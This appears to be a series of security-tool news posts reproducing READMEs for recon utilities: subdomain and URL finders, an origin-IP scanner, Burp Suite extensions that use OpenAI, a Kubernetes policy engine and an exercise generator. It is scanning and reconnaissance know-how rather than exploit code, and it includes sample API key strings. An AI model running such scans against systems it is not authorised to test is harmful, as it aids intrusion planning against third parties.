/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

USAGE:
xsubfind3r [OPTIONS]

INPUT:
-d, --domain string[] target domains
-l, --list string target domains' list file path

SOURCES:
--sources bool list supported sources
-u, --sources-to-use string[] comma(,) separeted sources to use
-e, --sources-to-exclude string[] comma(,) separeted sources to exclude

OPTIMIZATION:
-t, --threads int number of threads (default: 50)

OUTPUT:
--no-color bool disable colored output
-o, --output string output subdomains' file path
-O, --output-directory string output subdomains' directory path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)

Contribution

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Columbus-Server - API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features

By: Zion3R


Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.

Columbus returned 638 subdomains of tesla.com in 0.231 sec.


Usage

By default Columbus returns only the subdomains in a JSON string array:

curl 'https://columbus.elmasy.com/lookup/github.com'

But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.

DOMAIN="github.com"

curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
if [[ "$SUB" == "" ]]
then
HOST="$DOMAIN"
else
HOST="${SUB}.${DOMAIN}"
fi
echo "$HOST"
done

For more, check the features or the API documentation.

Entries

Currently, entries are got from Certificate Transparency.

Command Line

Usage of columbus-server:
-check
Check for updates.
-config string
Path to the config file.
-version
Print version informations.

-check: Check the lates version on GitHub. Prints up-to-date and returns 0 if no update required. Prints the latest tag (eg.: v0.9.1) and returns 1 if new release available. In case of error, prints the error message and returns 2.

Build

git clone https://github.com/elmasy-com/columbus-server
make build

Install

Create a new user:

adduser --system --no-create-home --disabled-login columbus-server

Create a new group:

addgroup --system columbus

Add the new user to the new group:

usermod -aG columbus columbus-server

Copy the binary to /usr/bin/columbus-server.

Make it executable:

chmod +x /usr/bin/columbus-server

Create a directory:

mkdir /etc/columbus

Copy the config file to /etc/columbus/server.conf.

Set the permission to 0600.

chmod -R 0600 /etc/columbus

Set the owner of the config file:

chown -R columbus-server:columbus /etc/columbus

Install the service file (eg.: /etc/systemd/system/columbus-server.service).

cp columbus-server.service /etc/systemd/system/

Reload systemd:

systemctl daemon-reload

Start columbus:

systemctl start columbus-server

If you want to columbus start automatically:

systemctl enable columbus-server


Chaos - Origin IP Scanning Utility Developed With ChatGPT

By: Zion3R


chaos is an 'origin' IP scanner developed by RST in collaboration with ChatGPT. It is a niche utility with an intended audience of mostly penetration testers and bug hunters.

An origin-IP is a term-of-art expression describing the final public IP destination for websites that are publicly served via 3rd parties. If you'd like to understand more about why anyone might be interested in Origin-IPs, please check out our blog post.

chaos was rapidly prototyped from idea to functional proof-of-concept in less than 24 hours using our principles of DevOps with ChatGPT.

usage: chaos.py [-h] -f FQDN -i IP [-a AGENT] [-C] [-D] [-j JITTER] [-o OUTPUT] [-p PORTS] [-P] [-r] [-s SLEEP] [-t TIMEOUT] [-T] [-v] [-x] 
_..._
.-'` `'-.
__|___________|__
\ /
`._ CHAOS _.'
`-------`
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/_____________________\\
CHAtgpt Origin-ip Scanner
_______ _______ _______ _______ _______
|\\ /|\\ /|\\ /|\\ /|\\/|
| +---+ | +---+ | +---+ | +---+ | +---+ |
| |H | | |U | | |M | | |A | | |N | |
| |U | | |S | | |A | | |N | | |C | |
| |M | | |E | | |N | | |D | | |O | |
| |A | | |R | | |C | | | | | |L | |
| +---+ | +---+ | +---+ | +---+ | +---+ |
|/_____|\\_____|\\_____|\\_____|\\_____\\

Origin IP Scanner developed with ChatGPT
cha*os (n): complete disorder and confusion
(ver: 0.9.4)


Features

  • Threaded for performance gains
  • Real-time status updates and progress bars, nice for large scans ;)
  • Flexible user options for various scenarios & constraints
  • Dataset reduction for improved scan times
  • Easy to use CSV output

Installation

  1. Download / clone / unzip / whatever
  2. cd path/to/chaos
  3. pip3 install -U pip setuptools virtualenv
  4. virtualenv env
  5. source env/bin/activate
  6. (env) pip3 install -U -r ./requirements.txt
  7. (env) ./chaos.py -h

Options

-h, --help            show this help message and exit
-f FQDN, --fqdn FQDN Path to FQDN file (one FQDN per line)
-i IP, --ip IP IP address(es) for HTTP requests (Comma-separated IPs, IP networks, and/or files with IP/network per line)
-a AGENT, --agent AGENT
User-Agent header value for requests
-C, --csv Append CSV output to OUTPUT_FILE.csv
-D, --dns Perform fwd/rev DNS lookups on FQDN/IP values prior to request; no impact to testing queue
-j JITTER, --jitter JITTER
Add a 0-N second randomized delay to the sleep value
-o OUTPUT, --output OUTPUT
Append console output to FILE
-p PORTS, --ports PORTS
Comma-separated list of TCP ports to use (default: "80,443")
-P, --no-prep Do not pre-scan each IP/port w ith `GET /` using `Host: {IP:Port}` header to eliminate unresponsive hosts
-r, --randomize Randomize(ish) the order IPs/ports are tested
-s SLEEP, --sleep SLEEP
Add N seconds before thread completes
-t TIMEOUT, --timeout TIMEOUT
Wait N seconds for an unresponsive host
-T, --test Test-mode; don't send requests
-v, --verbose Enable verbose output
-x, --singlethread Single threaded execution; for 1-2 core systems; default threads=(cores-1) if cores>2

Examples

Localhost Testing

Launch python HTTP server

% python3 -u -m http.server 8001
Serving HTTP on :: port 8001 (http://[::]:8001/) ...

Launch ncat as HTTP on a port detected as SSL; use a loop because --keep-open can hang

% while true; do ncat -lvp 8443 -c 'printf "HTTP/1.0 204 Plaintext OK\n\n<html></html>\n"'; done
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8443
Ncat: Listening on 0.0.0.0:8443

Also launch ncat as SSL on a port that will default to HTTP detection

% while true; do ncat --ssl -lvp 8444 -c 'printf "HTTP/1.0 202 OK\n\n<html></html>\n"'; done    
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 0208 1991 FA0D 65F0 608A 9DAB A793 78CB A6EC 27B8
Ncat: Listening on [::]:8444
Ncat: Listening on 0.0.0.0:8444

Prepare an FQDN file:

% cat ../test_localhost_fqdn.txt 
www.example.com
localhost.example.com
localhost.local
localhost
notreally.arealdomain

Prepare an IP file / list:

% cat ../test_localhost_ips.txt 
127.0.0.1
127.0.0.0/29
not_an_ip_addr
-6.a
=4.2
::1

Run the scan

  • Note an IPv6 network added to IPs on the CLI
  • -p to specify the ports we are listening on
  • -x for single threaded run to give our ncat servers time to restart
  • -s0.2 short sleep for our ncat servers to restart
  • -t1 to timeout after 1 second
% ./chaos.py -f ../test_localhost_fqdn.txt -i ../test_localhost_ips.txt,::1/126 -p 8001,8443,8444 -x -s0.2 -t1   
2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost.local
2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost
2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: notreally.arealdomain
2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block =4.2
2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block -6.a
2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block not_an_ip_addr
2023-06-21 12:48:33 [INFO] * ---- <META> ---- *
2023-06-21 12:48:33 [INFO] * Version: 0.9.4
2023-06-21 12:48:33 [INFO] * FQDN file: ../test_localhost_fqdn.txt
2023-06-21 12:48:33 [INFO] * FQDNs loaded: ['www.example.com', 'localhost.example.com']
2023-06-21 12:48:33 [INFO] * IP input value(s): ../test_localhost_ips.txt,::1/126
2023-06-21 12:48:33 [INFO] * Addresses pars ed from IP inputs: 12
2023-06-21 12:48:33 [INFO] * Port(s): 8001,8443,8444
2023-06-21 12:48:33 [INFO] * Thread(s): 1
2023-06-21 12:48:33 [INFO] * Sleep value: 0.2
2023-06-21 12:48:33 [INFO] * Timeout: 1.0
2023-06-21 12:48:33 [INFO] * User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 ch4*0s/0.9.4
2023-06-21 12:48:33 [INFO] * ---- </META> ---- *
2023-06-21 12:48:33 [INFO] 36 unique address/port addresses for testing
Prep Tests: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ&# 9608;β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 36/36 [00:29<00:00, 1.20it/s]
2023-06-21 12:49:03 [INFO] 9 IP/ports verified, reducing test dataset from 72 entries
2023-06-21 12:49:03 [INFO] 18 pending tests remain after pre-testing
2023-06-21 12:49:03 [INFO] Queuing 18 threads
++RCVD++ (200 OK) www.example.com @ :::8001
++RCVD++ (204 Plaintext OK) www.example.com @ :::8443
++RCVD++ (202 OK) www.example.com @ :::8444
++RCVD++ (200 OK) www.example.com @ ::1:8001
++RCVD++ (204 Plaintext OK) www.example.com @ ::1:8443
++RCVD++ (202 OK) www.example.com @ ::1:8444
++RCVD++ (200 OK) www.example.com @ 127.0.0.1:8001
++RCVD++ (204 Plaintext OK) www.example.com @ 127.0.0.1:8443
++RCVD++ (202 OK) www.example.com @ 127.0.0.1:8444
++RCVD++ (200 OK) localhost.example.com @ :::8001
++RCVD++ (204 Plaintext OK) localhost.example.com @ :::8443
++RCVD+ + (202 OK) localhost.example.com @ :::8444
++RCVD++ (200 OK) localhost.example.com @ ::1:8001
++RCVD++ (204 Plaintext OK) localhost.example.com @ ::1:8443
++RCVD++ (202 OK) localhost.example.com @ ::1:8444
++RCVD++ (200 OK) localhost.example.com @ 127.0.0.1:8001
++RCVD++ (204 Plaintext OK) localhost.example.com @ 127.0.0.1:8443
++RCVD++ (202 OK) localhost.example.com @ 127.0.0.1:8444
Origin Scan: 100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ&#96 08;β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 18/18 [00:06<00:00, 2.76it/s]
2023-06-21 12:49:09 [RSLT] Results from 5 FQDNs:
::1
::1:8444 => (202 / OK)
::1:8443 => (204 / Plaintext OK)
::1:8001 => (200 / OK)

127.0.0.1
127.0.0.1:8001 => (200 / OK)
127.0.0.1:8443 => (204 / Plaintext OK)
127.0.0.1:8444 => (202 / OK)

::
:::8001 => (200 / OK)
:::8443 => (204 / Plaintext OK)
:::8444 => (202 / OK)

www.example.com
:::8001 => (200 / OK)
:::8443 => (204 / Plaintext OK)
:::8444 => (202 / OK)
::1:8001 => (200 / OK)
::1:8443 => (204 / Plaintext OK)
::1:8444 => (202 / OK)
127.0.0.1:8001 => (200 / OK)
127.0.0.1:8443 => (204 / Plaintext OK)
127.0.0.1:8444 => (202 / OK)

localhost.example.com
:::8001 => (200 / OK)
:::8443 => (204 / Plaintext OK)
:::8444 => (202 / OK)
::1:8001 => (200 / OK)
::1:8443 => (204 / Plaintext OK)
::1:8444 => (202 / OK)
127.0.0.1:8001 => (200 / OK)
127.0.0.1:8443 => (204 / Plaintext OK)
127.0.0.1:8444 => (202 / OK)


rst@r57 chaos %

Test & Verbose localhost

-T runs in test mode (do everything except send requests)

-v verbose option provides additional output


Known Defects

  • HTTP/HTTPS detection is not ideal
  • Need option to adjust CSV newline delimiter
  • Need options to adjust where long strings / many lines are truncated
  • Try to figure out why we marked requests v2.x as required ;)
  • Options for very-verbose / quiet
  • Stagger thread launch when we're using sleep / jitter
  • Search for meta-refresh in 200 responses
  • Content-Location header for 201s ?
  • Improve thread name generation so we have the right number of unique names
  • Sanity check on IPv6 netmasks to prevent scans that outlive the sun?
  • TBD?

Related Links

Disclaimers

  • Copyright (C) 2023 RST
  • This software is distributed on an "AS IS" basis, without express or implied warranties of any kind
  • This software is intended for research and/or authorized testing; it is your responsibility to ensure you are authorized to use this software in any way
  • By using this software you acknowledge that you are responsible for your actions and assume all liability for any direct, indirect, or other damages


Xurlfind3R - A CLI Utility To Find Domain'S Known URLs From Curated Passive Online Sources

By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find domain's known URLs from curated passive online sources.


Features

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The above steps, download and extract, can be combined into a single step with this onliner

curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xurlfind3r.git 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, Github and Intelligence X require API keys to work, URLScan supports API key but not required. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - and uses the YAML format. Multiple API keys can be specified for each of these source from which one of them will be used.

Example config.yaml:

version: 0.2.0
sources:
- bevigil
- commoncrawl
- github
- intelx
- otx
- urlscan
- wayback
keys:
bevigil:
- awA5nvpKU3N8ygkZ
github:
- d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
- asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
intelx:
- 2.intelx.io:00000000-0000-0000-0000-000000000000
urlscan:
- d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xurlfind3r use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

USAGE:
xurlfind3r [OPTIONS]

TARGET:
-d, --domain string (sub)domain to match URLs

SCOPE:
--include-subdomains bool match subdomain's URLs

SOURCES:
-s, --sources bool list sources
-u, --use-sources string sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
--skip-wayback-robots bool with wayback, skip parsing robots.txt snapshots
--skip-wayback-source bool with wayback , skip parsing source code snapshots

FILTER & MATCH:
-f, --filter string regex to filter URLs
-m, --match string regex to match URLs

OUTPUT:
--no-color bool no color mode
-o, --output string output URLs file path
-v, --verbosity string debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
-c, --configuration string configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

Examples

Basic

xurlfind3r -d hackerone.com --include-subdomains

Filter Regex

# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '`^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$`'

Match Regex

# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



AiCEF - An AI-assisted cyber exercise content generation framework using named entity recognition

By: Zion3R


AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities, arsenal (eg. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.

We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform a set of individual tasks which would help an exercise planner (EP) to create a timely and targeted Cybersecurity Exercise Scenario, regardless of her experience.


Problems an Exercise Planner faces:

  • Constant table-top research to have fresh content
  • Realistic CSE scenario creation can be difficult and time-consuming
  • Meeting objectives but also keeping it appealing for the target audience
  • Is the relevance and timeliness aspects considered?
  • Can all the above be automated?

Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.

Release Roadmap

The updated project, AiCEF v.2.0 is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functinality will start being release by early June 2023. Thank you for your patience.

Installation

The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you deploy MySQL manually in a dedicated environment and then to start the other components using Docker.

First, make sure you have docker-compose installed in your environment:


Linux:

$ sudo apt-get install docker-compose

Then, clone the repository:

$ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
$ cd /<choose-a-path>/AiCEF-docker

Configure the environment settings

Import the MySQL file in your

$ mysql -u <your_username> Γ’β‚¬β€œ-password=<your_password> AiCEF_db < AiCEF_db.sql 

Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it accordingly to your needs.

$ cp .env.sample .env

Run AiCEF

Note: Make sure you have an OpenAI API key available. Load the environment setttings (including your MySQL connection details):

set -a ; source .env

Finally, run docker-compose in detached (-d) mode:

$ sudo docker-compose up -d

Usage

A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using MLTP module and storing them in a knowledge database called KDb. Incidents are then generated using IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using APT Enhancer by using the activity of known APT groups from MITRE or manually.

Find below some sample usage screenshots:

Features

  • An AI-powered Cyber Exercise Generation Framework
  • Developed in Python & EEL
  • Open source library Stixview
  • Stores data in MYSQL
  • API to Text Synthesis Models (ex. GPT-3.5)
  • Can create incidents based on TTPs of 125 known APT actors
  • Models Cyber Exercise Content in machine readable STIX2.1 [2] (.json) and human readable format (.pdf)

Authors

AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.

References

[1] https://link.springer.com/article/10.1007/s10207-023-00693-z

[2] https://oasis-open.github.io/cti-documentation/stix/intro.html

Contributing

Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:

  1. Fork this repository
  2. Create a new branch (git checkout -b feature/your-branch-name)
  3. Make your changes and commit them (git commit -m 'Add some feature')
  4. Push to the branch (git push origin feature/your-branch-name)
  5. Open a new pull request

License

AiCEF is licensed under Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See for more information.

Under the following terms:

Attribution β€” You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. NonCommercial β€” You may not use the material for commercial purposes. No additional restrictions β€” You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.



Polaris - Validation Of Best Practices In Your Kubernetes Clusters

By: Zion3R

Polaris is an open source policy engine for Kubernetes

Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.

Polaris can be run in three different modes:

  • As a dashboard - Validate Kubernetes resources against policy-as-code.
  • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
  • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.

Validation of best practices in your Kubernetes clusters (6)

Documentation

Check out the documentation at docs.fairwinds.com

Join the Fairwinds Open Source Community

The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

Other Projects from Fairwinds

Enjoying Polaris? Check out some of our other projects:

  • Goldilocks - Right-size your Kubernetes Deployments by compare your memory and CPU settings against actual usage
  • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
  • Nova - Check to see if any of your Helm charts have updates available
  • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

Or check out the full list

Fairwinds Insights

If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.



Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

By: Zion3R


A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

Artemis is experimental software, under active development - use at your own risk.

Features

For an up-to-date list of features, please refer to the documentation.

Development

Tests

To run the tests, use:

./scripts/test

Code formatting

Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

To run it locally, use:

pre-commit run --all-files

To setup pre-commit so that it runs before each commit, use:

pre-commit install

Building the docs

To build the documentation, use:

cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html

How do I write my own module?

Please refer to the documentation.

Contributing

Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



ReconAIzer - A Burp Suite Extension To Add OpenAI (GPT) On Burp And Help You With Your Bug Bounty Recon To Discover Endpoints, Params, URLs, Subdomains And More!

By: Zion3R


ReconAIzer is a powerful Jython extension for Burp Suite that leverages OpenAI to help bug bounty hunters optimize their recon process. This extension automates various tasks, making it easier and faster for security researchers to identify and exploit vulnerabilities.

Once installed, ReconAIzer add a contextual menu and a dedicated tab to see the results:


Prerequisites

  • Burp Suite
  • Jython Standalone Jar

Installation

Follow these steps to install the ReconAIzer extension on Burp Suite:

Step 1: Download Jython

  1. Download the latest Jython Standalone Jar from the official website: https://www.jython.org/download
  2. Save the Jython Standalone Jar file in a convenient location on your computer.

Step 2: Configure Jython in Burp Suite

  1. Open Burp Suite.
  2. Go to the "Extensions" tab.
  3. Click on the "Extensions settings" sub-tab.
  4. Under "Python Environment," click on the "Select file..." button next to "Location of the Jython standalone JAR file."
  5. Browse to the location where you saved the Jython Standalone Jar file in Step 1 and select it.
  6. Wait for the "Python Environment" status to change to "Jython (version x.x.x) successfully loaded," where x.x.x represents the Jython version.

Step 3: Download and Install ReconAIzer

  1. Download the latest release of ReconAIzer
  2. Open Burp Suite
  3. Go back to the "Extensions" tab in Burp Suite.
  4. Click the "Add" button.
  5. In the "Add extension" dialog, select "Python" as the "Extension type."
  6. Click on the "Select file..." button next to "Extension file" and browse to the location where you saved the ReconAIzer.py file in Step 3.1. Select the file and click "Open."
  7. Make sure the "Load" checkbox is selected and click the "Next" button.
  8. Wait for the extension to be loaded. You should see a message in the "Output" section stating that the ReconAIzer extension has been successfully loaded.

Congratulations! You have successfully installed the ReconAIzer extension in Burp Suite. You can now start using it to enhance your bug bounty hunting experience.

Once it's done, you must configure your OpenAI API key on the "Config" tab under "ReconAIzer" tab.

Feel free to suggest prompts improvements or anything you would like to see on ReconAIzer!

Happy bug hunting!



Burpgpt - A Burp Suite Extension That Integrates OpenAI's GPT To Perform An Additional Passive Scan For Discovering Highly Bespoke Vulnerabilities, And Enables Running Traffic-Based Analysis Of Any Type

By: Zion3R


burpgpt leverages the power of AI to detect security vulnerabilities that traditional scanners might miss. It sends web traffic to an OpenAI model specified by the user, enabling sophisticated analysis within the passive scanner. This extension offers customisable prompts that enable tailored web traffic analysis to meet the specific needs of each user. Check out the Example Use Cases section for inspiration.

The extension generates an automated security report that summarises potential security issues based on the user's prompt and real-time data from Burp-issued requests. By leveraging AI and natural language processing, the extension streamlines the security assessment process and provides security professionals with a higher-level overview of the scanned application or endpoint. This enables them to more easily identify potential security issues and prioritise their analysis, while also covering a larger potential attack surface.

[!WARNING] Data traffic is sent to OpenAI for analysis. If you have concerns about this or are using the extension for security-critical applications, it is important to carefully consider this and review OpenAI's Privacy Policy for further information.

[!WARNING] While the report is automated, it still requires triaging and post-processing by security professionals, as it may contain false positives.

[!WARNING] The effectiveness of this extension is heavily reliant on the quality and precision of the prompts created by the user for the selected GPT model. This targeted approach will help ensure the GPT model generates accurate and valuable results for your security analysis.

Β 

Features

  • Adds a passive scan check, allowing users to submit HTTP data to an OpenAI-controlled GPT model for analysis through a placeholder system.
  • Leverages the power of OpenAI's GPT models to conduct comprehensive traffic analysis, enabling detection of various issues beyond just security vulnerabilities in scanned applications.
  • Enables granular control over the number of GPT tokens used in the analysis by allowing for precise adjustments of the maximum prompt length.
  • Offers users multiple OpenAI models to choose from, allowing them to select the one that best suits their needs.
  • Empowers users to customise prompts and unleash limitless possibilities for interacting with OpenAI models. Browse through the Example Use Cases for inspiration.
  • Integrates with Burp Suite, providing all native features for pre- and post-processing, including displaying analysis results directly within the Burp UI for efficient analysis.
  • Provides troubleshooting functionality via the native Burp Event Log, enabling users to quickly resolve communication issues with the OpenAI API.

Requirements

  1. System requirements:
  • Operating System: Compatible with Linux, macOS, and Windows operating systems.

  • Java Development Kit (JDK): Version 11 or later.

  • Burp Suite Professional or Community Edition: Version 2023.3.2 or later.

